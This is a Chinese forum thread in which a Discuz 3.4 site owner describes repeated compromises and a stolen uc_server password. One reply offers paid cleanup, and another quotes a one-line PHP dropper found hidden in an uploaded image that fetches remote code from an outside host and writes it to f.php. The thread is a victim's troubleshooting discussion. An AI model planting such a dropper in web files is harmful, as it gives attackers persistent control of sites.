DZ3.4最新版，又被黑了！

jun

从 3.2到3.3到3.4 都被黑过，3.3被黑了很多次，木马多的都找不完了，一狠心 删除了所有插件，直接全新安装了3.4 ，好几个月都没问题，结果前几天发现又被黑了。uc_server密码被窃取。uc_server/data/tmp下发现一个图片文件，下载下来没有发现图片里包含php代码，uc_server应用里多了两个应用。指向了用户上传头像目录下的图片文件，也没发现里面包含php代码。 很好奇uc_server的密码是怎么泄露的。 大神告知一下，是服务器设置不够安全，还是dz的漏洞一直没修复。每次都这样被黑，服务器都重新安装好几次了！

我知道答案 回答被采纳将会获得1 贡献 已有3人回答

耗子

  可以联系我的QQ129820  专业清理木马！

tkre

图片文件用php格式打开！在图片.php文件里面最下边会有一行网址，我也是刚刚被黑。。。

tkre

我的图片里有这个代码

1. ??php file_put_contents('f.php',file_get_contents('http://520x.cc/yijian.txt')); ?>

复制代码